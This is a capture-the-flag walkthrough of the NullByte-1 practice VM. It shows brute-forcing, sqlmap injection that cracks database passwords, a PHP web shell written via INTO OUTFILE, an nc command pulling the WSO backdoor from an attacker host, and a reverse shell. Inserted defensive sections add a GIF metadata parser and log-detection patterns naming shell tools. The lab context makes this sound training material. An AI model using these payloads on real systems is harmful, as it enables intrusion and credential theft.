[Pentest Series] NullByte-1 Part-1

Hi everyone

This time I'm still using a VM from VulnHub, namely NullByte. Download it here: https://www.vulnhub.com/entry/nullbyte-1,126/

In my assessment, this challenge isn't really that hard. It just needs a lot of brute-forcing, so most of the time is spent there.

[!] VM Level: Medium

Set up the network and rock

I assume you already know how to set up the network. Run nmap and you get a port list like this

Nmap scan report for 192.168.100.5
Host is up (0.00025s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
777/tcp open multiling-http
MAC Address: 08:00:27:86:83:73 (Oracle VirtualBox virtual NIC)

At this stage you can do a deep scan with -p- (meaning scan ports 1–65535) and/or -A -sV to look for vulnerabilities in the services concerned

As for me, I went straight to opening the HTTP page

Directory scanning against the web server

As usual, using dirb with the standard common_web.txt. All my wordlists come from Kali Linux

---- Scanning URL: http://192.168.100.5/ ----
+ http://192.168.100.5/index.html (CODE:200|SIZE:196)
==> DIRECTORY: http://192.168.100.5/javascript/
==> DIRECTORY: http://192.168.100.5/phpmyadmin/
+ http://192.168.100.5/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.100.5/uploads/

Oh, it turns out there's a phpmyadmin. But since we don't have a username/password yet, let's skip it for now

Security by Obscurity

I tried every kind of scan and got nothing. Here:

$ exiftool main.gif
ExifTool Version Number : 10.10
File Name : main.gif
Directory : .
File Size : 16 kB
File Modification Date/Time : 2017:02:14 21:44:22+07:00
File Access Date/Time : 2017:02:14 21:44:24+07:00
File Inode Change Date/Time : 2017:02:14 21:44:22+07:00
File Permissions : rw-rw-r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
Megapixels : 0.071

Out of curiosity I looked at the exif data and there's an odd comment. Hmm, maybe it's a web directory? After I investigated, a strange form like this appeared

And the source looks like this

<center><font color='red'>invalid key</font></center><br>
<center>
<form method="post" action="index.php">
Key:<br>
<input type="password" name="key">
</form>
</center>
<!-- this form isn't connected to mysql, password ain't that complex --!>

When I idly looked for other files that might be a clue

---- Scanning URL: http://192.168.100.5/kzMb5nVYJw/ ----
+ http://192.168.100.5/kzMb5nVYJw/index.php (CODE:200|SIZE:187)
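From the defender's side, the comment that gave away the hidden directory is a reminder to audit metadata in published images. As an added example (not from the original post), here is a small parser for the GIF Comment Extension, run on a constructed 1x1 GIF rather than the VM's main.gif; it also reassembles comments split over several sub-blocks.

```python
import struct
def _read_subblocks(data, pos):
    """Concatenate a chain of GIF data sub-blocks starting at pos; return (payload, next_pos)."""
    out = bytearray()
    while True:
        size = data[pos]
        pos += 1
        if size == 0:  # block terminator
            return bytes(out), pos
        out += data[pos:pos + size]
        pos += size

def gif_comments(data):
    """Return every Comment Extension (0x21 0xFE) payload in a GIF, decoded as latin-1."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF file")
    packed, pos = data[10], 13        # logical screen descriptor packed field, first block offset
    if packed & 0x80:                 # global color table: 3 * 2^(N+1) bytes
        pos += 3 * (2 << (packed & 0x07))
    comments = []
    while pos < len(data) and data[pos] != 0x3B:   # 0x3B is the trailer
        block = data[pos]
        pos += 1
        if block == 0x21:             # extension: label byte, then data sub-blocks
            label = data[pos]
            payload, pos = _read_subblocks(data, pos + 1)
            if label == 0xFE:
                comments.append(payload.decode("latin-1"))
        elif block == 0x2C:           # image descriptor, optional local color table, LZW data
            lpacked = data[pos + 8]
            pos += 9
            if lpacked & 0x80:
                pos += 3 * (2 << (lpacked & 0x07))
            _, pos = _read_subblocks(data, pos + 1)  # +1 skips the LZW minimum code size
        else:
            raise ValueError("unknown block 0x%02x at offset %d" % (block, pos - 1))
    return comments

def _subblocks(payload):
    """Encode bytes as GIF data sub-blocks (max 255 bytes each) plus terminator."""
    chunks = [payload[i:i + 255] for i in range(0, len(payload), 255)]
    return b"".join(bytes([len(c)]) + c for c in chunks) + b"\x00"

def build_sample_gif(comment=None):
    """Constructed 1x1 GIF89a (test input, not the VM's main.gif) with an optional comment."""
    gif = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0, 0, 0)  # no global color table
    if comment is not None:
        gif += b"\x21\xFE" + _subblocks(comment.encode("latin-1"))
    gif += b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0) + b"\x02" + _subblocks(b"\x44\x01")
    return gif + b"\x3B"
```

Run gif_comments over the bytes of any GIF you are about to publish; a non-empty result is metadata worth stripping.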

OK, like it or not, it's time to brute-force. Open Burp and prepare a password-guessing payload list (find rockyou). We'll brute-force this page with Burp Intruder

After a long wait…..

One key payload gets a response that differs from all the others. Maybe that's what happens on a successful login, so let's try it

If you enter a query, a request like this appears:

http://192.168.100.5/kzMb5nVYJw/420search.php?usrtosearch=a

Let's scan it with Burp, hopefully there's a bug here

Confirmed

Exploiting the Bug

Now use SQLMap to exploit it

sqlmap.py -u "http://192.168.100.5/kzMb5nVYJw/420search.php?usrtosearch=a" -p usrtosearch --dbs --is-dba --users --passwords
[22:22:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[22:22:42] [INFO] testing if current user is DBA
[22:22:42] [INFO] fetching current user
current user is DBA: True
[22:22:42] [INFO] fetching database users
database management system users [6]:
[*] 'debian-sys-maint'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'nullbyte'
[22:22:42] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
[22:22:44] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/home/kucing/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[22:22:45] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[22:22:45] [INFO] starting dictionary-based cracking (mysql_passwd)
[22:22:45] [INFO] starting 4 processes
[22:22:53] [INFO] cracked password 'sunnyvale' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC
[*] phpmyadmin [1]:
password hash: *18DC78FB0C441444482C7D1132C7A23D705DAFA7
clear-text password: sunnyvale
[*] root [1]:
password hash: *18DC78FB0C441444482C7D1132C7A23D705DAFA7
clear-text password: sunnyvale
[22:22:54] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
[22:22:54] [INFO] fetched data logged to text files under '/home/kucing/.sqlmap/output/192.168.100.5'
[*] shutting down at 22:22:54

Now log in using root:sunnyvale

Then run an SQL query to read /etc/passwd

select CAST(load_file('/etc/passwd') AS CHAR(100000000) CHARACTER SET utf8)
RESULT
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
saned:x:110:119::/var/lib/saned:/bin/false
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
eric:x:1001:1001:,,,:/home/eric:/bin/bash
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ramses:x:1002:1002:,,,:/home/ramses:/bin/bash

Inspecting the web directory

Now let's try brute-forcing the Apache configuration file. See my previous writeup on the likely locations of the configuration

select CAST(load_file('/etc/apache2/sites-enabled/000-default.conf') AS CHAR(10000000) CHARACTER SET utf8)
RESULT
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com

ServerAdmin webmaster@localhost
DocumentRoot /var/www/html

If you look above, there's an "uploads" folder.
Well, why not give it a try? :3

select CAST(load_file('/var/www/html/uploads/index.html') AS CHAR(10000000) CHARACTER SET utf8)
RESULT
<html>
<head><title>Uploads dir</title></head>
<body>
<p>Directory listing not allowed here.</p>
</body>
</html>

Writing a web shell into the directory

Now it's time to try writing a file into that uploads directory, with an SQL command like this

SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/uploads/shell.php'
MySQL returned an empty result set (i.e. zero rows). (Query took 0.0003 seconds.)

Then try accessing it with curl like this

$ curl -X GET "192.168.100.5/uploads/shell.php?cmd=id%20;%20pwd"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html/uploads

Make sure netcat is available to transfer the actual backdoor shell file

$ curl -X GET "192.168.100.5/uploads/shell.php?cmd=which%20nc"
/bin/nc
%20 stands in for a space. If you use a literal space it won't work. In the browser it works automatically, since replacing a space with %20 is a basic browser feature

Uploading the WSO backdoor file

Use netcat to transfer the file

$ nc -lvp 8080 < wso2.5.1.php 
Listening on [0.0.0.0] (family 0, port 8080)

And the URL you access will look like this

http://192.168.100.5/uploads/shell.php?cmd=nc%20192.168.100.3%208080%20%3E%20wso.php

And here is the web backdoor I meant
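From the defender's side, the stages above leave a recognisable trail in the web server log. As an added example (not from the original post), this detection logic runs over constructed Apache combined-log lines that mirror this writeup's requests: the sqlmap probe against usrtosearch and the cmd parameter on the PHP file written into /uploads/.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-log lines modelled on this writeup's requests (sample input, not VM logs).
SAMPLE_LOG = """\
192.168.100.3 - - [14/Feb/2017:22:20:01 +0700] "GET /kzMb5nVYJw/420search.php?usrtosearch=a HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.168.100.3 - - [14/Feb/2017:22:22:42 +0700] "GET /kzMb5nVYJw/420search.php?usrtosearch=a%27%20AND%201%3D1--%20 HTTP/1.1" 200 412 "-" "sqlmap/1.1"
192.168.100.3 - - [14/Feb/2017:22:30:10 +0700] "GET /uploads/shell.php?cmd=id%20;%20pwd HTTP/1.1" 200 96 "-" "curl/7.52.1"
192.168.100.3 - - [14/Feb/2017:22:31:05 +0700] "GET /uploads/shell.php?cmd=nc%20192.168.100.3%208080%20%3E%20wso.php HTTP/1.1" 200 0 "-" "curl/7.52.1"
192.168.100.7 - - [14/Feb/2017:22:35:00 +0700] "GET /index.html HTTP/1.1" 200 196 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Quote-then-keyword, comment sequences and the MySQL file primitives used in the injection stage
SQLI_RE = re.compile(r"""['"]\s*(and|or|union|select|sleep)\b|--\s|/\*|load_file\s*\(|into\s+outfile""", re.I)
# Shell chaining/redirection characters and transfer tools inside a parameter value
SHELL_RE = re.compile(r"[;|&`$<>]|\b(nc|netcat|bash|sh|wget|curl)\b")

def query_params(query):
    # Split on '&' only: some Python versions also split on ';', which would hide "id ; pwd"
    pairs = []
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def classify(line):
    """Return the findings for one log line (empty list if nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url, findings = urlsplit(m.group("url")), []
    if "sqlmap" in m.group("ua").lower():
        findings.append("sqlmap user-agent")
    if url.path.startswith("/uploads/") and url.path.endswith(".php"):
        findings.append("PHP executed from /uploads/")  # an upload directory should never execute scripts
    for name, value in query_params(url.query):
        if SQLI_RE.search(value):
            findings.append("SQL injection pattern in parameter " + name)
        if url.path.startswith("/uploads/") and SHELL_RE.search(value):
            findings.append("shell syntax in parameter " + name)
    return findings

def scan(log_text):
    """Return (client_ip, request_url, findings) for every line that triggered a rule."""
    rows = [(LOG_RE.match(l), classify(l)) for l in log_text.splitlines()]
    return [(m.group("ip"), m.group("url"), f) for m, f in rows if f]
```

The cheapest fix for the last two findings is an Apache rule that refuses to execute PHP under /uploads/ at all; the SQL-stage findings are the cue to check whether the application's database user really needs FILE privilege or DBA rights.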

Taking a www-data shell

If you've read the previous pentest series articles, you should already be able to do this, so I don't need to explain it again xD

$ nc -lvp 31337
Listening on [0.0.0.0] (family 0, port 31337)
Connection from [192.168.100.5] port 31337 [tcp/*] accepted (family 2, sport 37232)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash');"
www-data@NullByte:/var/www/html/uploads$ ppwwdd
/var/www/html/uploads
www-data@NullByte:/var/www/html/uploads$ llss
file.txt  index.html  shell.php  wso.php
www-data@NullByte:/var/www/html/uploads$ iidd
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Yes, that's right, the shell is a bit ugly

Epilogue

In short, this VM seems fairly easy. But it's interesting enough to discuss, so stay tuned for the next article :)

Don't forget to share this article with your friends who are also learning hacking

Habibie Faried
habibiefaried@gmail.com
@habibiefaried
CISSP & OSC* Wanna Be
